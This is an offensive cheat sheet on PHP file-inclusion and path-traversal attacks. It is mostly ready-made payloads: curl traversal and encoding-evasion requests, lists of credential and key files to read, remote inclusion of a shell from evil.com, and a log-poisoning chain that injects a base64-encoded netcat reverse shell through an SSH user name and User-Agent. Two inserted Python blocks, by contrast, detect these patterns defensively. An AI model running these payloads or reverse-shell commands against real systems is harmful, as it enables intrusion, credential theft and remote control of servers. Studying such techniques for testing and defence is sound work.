LFI - RFI - Path traversal

LFI: Local File Inclusion

- Basic Includes

curl --silent "http://localhost/index.php?file=/etc/subgid"

- Using Wrappers

To read a php file:

http://localhost/file.php?file=php://filter/convert.base64-encode/resource=prueba.php

curl --silent "http://localhost/file.php?file=php://filter/convert.base64-encode/resource=prueba.php" | base64 -d 2>/dev/null

- Directory Traversal Attack

http://localhost/file.php?file=../../../../../etc/passwd

http://localhost/file.php?file=../../../../../etc/passwd?

Null byte injection:

http://localhost/file.php?file=../../../../../etc/passwd%00

curl --silent "http://localhost/index.php?file=../../../../../../../../../etc/subgid%00"

(Null byte injection was fixed after PHP 5.3.4)

- Filter evasion

curl --silent "http://localhost/index.php?file=..%2F..%2F..%2F..%2F..%2Fetc/subgid"

curl --silent "http://localhost/index.php?file=....//....//....//....//....//etc/subgid"

- Double Encoding

First encoding: %2E%2E%2Fetc%2Fpasswd

Second encoding (the % itself is encoded again): %252E%252E%252Fetc%252Fpasswd

- Path Truncation

We append ./ hundreds of times. Once the file name is longer than 4096 bytes, the part beyond that limit is dropped, so our request is effectively ../../../etc/passwd

../../../../etc/passwd/././././././<...>/.php.
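As an added example (not from the original notes), the server-side check a defender would put in front of such a file parameter, written in Python and assuming a hypothetical include root /var/www/html/pages: it percent-decodes the value repeatedly, cuts at the null byte the way open() would, and flags the traversal, double-encoding, dot-padding, wrapper and oversized-path variants listed above.

```python
import posixpath
from urllib.parse import unquote

# Added example (not the page's code). The wrapper list and PATH_MAX are the
# evasions the notes above describe; base_dir is a hypothetical include root.
WRAPPERS = ("php://", "data:", "expect://", "phar://", "zip://", "file://",
            "http://", "https://", "ftp://")
MAX_PATH = 4096  # Linux PATH_MAX; the truncation trick needs names longer than this


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable; the round count exposes double encoding."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def resolve_under(base_dir, user_path):
    """Normalized path if it stays inside base_dir, else None."""
    base = base_dir.rstrip("/")
    joined = posixpath.normpath(posixpath.join(base, user_path.replace("\\", "/")))
    return joined if joined == base or joined.startswith(base + "/") else None


def analyze(raw, base_dir="/var/www/html/pages"):
    """Classify a raw file= value: (sorted findings, resolved path or None)."""
    findings = set()
    if len(raw) > MAX_PATH:
        findings.add("oversized-path")
    decoded, rounds = decode_fully(raw)
    if rounds > 1:
        findings.add("double-encoding")
    if "\x00" in decoded:
        findings.add("null-byte")
        decoded = decoded.split("\x00", 1)[0]  # what a C-level open() would see
    if decoded.lower().startswith(WRAPPERS):
        findings.add("stream-wrapper")
    if decoded.startswith("/"):
        findings.add("absolute-path")
    # segments made only of dots ("....") defeat filters that strip "../" once
    if any(len(seg) > 2 and set(seg) == {"."} for seg in decoded.split("/")):
        findings.add("dot-padding")
    resolved = resolve_under(base_dir, decoded)
    if resolved is None:
        findings.add("escapes-base-dir")
    return sorted(findings), resolved
```

Note that the dot-padded payload normalizes to a path inside the base directory, which is why it is flagged by shape rather than by resolution: it only becomes a traversal once a naive filter strips the inner ../ for the attacker.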

- LFI-Jhaddix wordlist

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

- Interesting files to look at in Linux

/etc/issue
/etc/motd
/etc/passwd
/etc/group
/etc/resolv.conf
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile
/etc/mtab
/etc/inetd.conf
/var/log/dmessage
.htaccess
config.php
authorized_keys
id_rsa
id_rsa.keystore
id_rsa.pub
known_hosts
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/var/log/access_log
/var/log/mail
/var/log/sshd.log
/var/log/vsftpd.log
.bash_history
.mysql_history
.my.cnf
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version
/proc/self/environ

- Interesting files to look at in Windows

c:\WINDOWS\system32\eula.txt
c:\boot.ini
c:\WINDOWS\win.ini
c:\WINNT\win.ini
c:\WINDOWS\Repair\SAM
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
c:\php\php.ini
c:\php5\php.ini
c:\php4\php.ini
c:\apache\php\php.ini
c:\xampp\apache\bin\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\WINDOWS\TEMP\
c:\php\sessions\
c:\php5\sessions\
c:\php4\sessions\
windows\repair\SAM
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

RFI: Remote File Inclusion

- Basic RFI

Basic example:

vuln.php?page=http://evil.com/shell.txt

Another example, in which the gwolle-gb WordPress plugin is vulnerable to RFI:

http://192.168.1.X/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://{My IP}/wp-load.php

- LFI to RFI Using Wrappers

Wrapper php://filter

Wrapper zip://

Wrapper data://

Wrapper expect://

Wrapper php://input

Wrapper phar://

LFI to RCE: Local File Inclusion to Remote Code Execution

- Log Poisoning

First we try to access a log file.

Ex: /var/log

/var/log/apache2/access.log

Then:

curl -s -H "User-Agent: <?php system('whoami'); ?> " "http://localhost/example.php?file=/var/log/apache2/access.log"

(curl means client URL; it communicates with a web or application server by specifying the relevant URL and the data that need to be sent or received. In this example we add -s (silent mode) and -H, which stands for an extra header to include in the request.)

Now we have sent a request to that URL with the User-Agent set to <?php system('whoami'); ?>, so when the log file is included the web server interprets the PHP.

In /var/log/auth.log we can see all the users trying to authenticate on the system.

So we can try authenticating with an invalid user.

Here we are trying to define a command as the user name.

This will depend on what is running behind the web server; look at Pentest Monkey to see commands depending on this.

nc -nlvp 443 (first we listen on port 443)

First we test it against our own machine (nc -e /bin/bash <our ip> 443).

Then we try to authenticate on the system with the previous command, so that the shell is sent to our machine.

echo 'nc -e /bin/bash <our ip> 443' | base64 (Here we encode the previous command in base64 so that the system reads it without problems.)

echo "<command encoded in base64>" | base64 -d | bash (Here we have the command that decodes the previous command and executes it with bash.)

Now we inject PHP code that runs that command:

ssh '<?php system("echo <command encoded in base64> | base64 -d | bash"); ?>'@<target> (Here we run the command and try to get a reverse shell.)

Then we enter an invalid password.

Now, in the terminal window where we are listening on port 443 (nc -nlvp 443), if we type whoami we can confirm we are in the system and can run commands (ex: script /dev/null -c bash).
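Added example, not part of the original notes: detection logic in Python over constructed Apache access-log and sshd auth-log lines, flagging the two halves of the log-poisoning technique above, PHP tags landing in a logged field (User-Agent, SSH user name) and requests whose file parameter points at a log file or /proc/self/environ.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines (not real traffic): two Apache access-log entries
# and two sshd auth-log entries, mirroring the poisoning steps described above.
SAMPLE_LINES = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /example.php?file=/var/log/apache2/access.log HTTP/1.1" 200 9812 "-" "<?php system(\'whoami\'); ?>"',
    'Mar 12 10:02:11 web sshd[2210]: Invalid user <?php system("id"); ?> from 10.0.0.9 port 51022',
    'Mar 12 10:02:30 web sshd[2231]: Invalid user backup from 10.0.0.7 port 51100',
]

# PHP open tags have no business in a User-Agent or a login name
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
# Paths an include parameter points at when it is being used to execute a poisoned log
LOG_TARGETS = re.compile(r"/var/log/|/proc/self/environ|/var/lib/php/sessions|/tmp/sess_",
                         re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_line(line):
    """Return the set of indicators found in one log line."""
    hits = set()
    if PHP_TAG.search(line):
        hits.add("php-tag-in-log")
    match = REQUEST.search(line)
    if match:
        # decode the query so percent-encoded paths are caught as well
        query = unquote(urlsplit(match.group(1)).query)
        if LOG_TARGETS.search(query):
            hits.add("log-file-in-request")
    return hits


def scan_log(lines):
    """Return [(line_number, sorted indicators)] for suspicious lines only."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            results.append((number, sorted(hits)))
    return results
```

A single request carrying both indicators (line 2 of the sample) is the strongest signal: the PHP tag is written into the log and the same request asks the application to include that log.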

Tools

- fimap

https://github.com/kurobeats/fimap

To perform a single scan that tries LFI and audits a single URL:

fimap.py -s -u "http://target-site.com/index2.php?x="

To run a scan using the Harvester (give it the root directory of a site and it will automatically crawl the web; use -d to set a crawl depth):

fimap.py -H -u http://target-site.com/ -w output.txt

To test RFI:

fimap.py --test-rfi

- lfiscan

https://github.com/machine1337/lfiscan

- dotdotpwn

https://github.com/wireghoul/dotdotpwn

dotdotpwn -m http-url -d 10 -f /etc/passwd -u "{link extracted with paramspider or similar tool}=TRAVERSAL" -b -k "root:"

dotdotpwn -m http-url -d 10 -f /etc/shadow -u "{link extracted with paramspider or similar tool}=TRAVERSAL" -b -k "admin:"
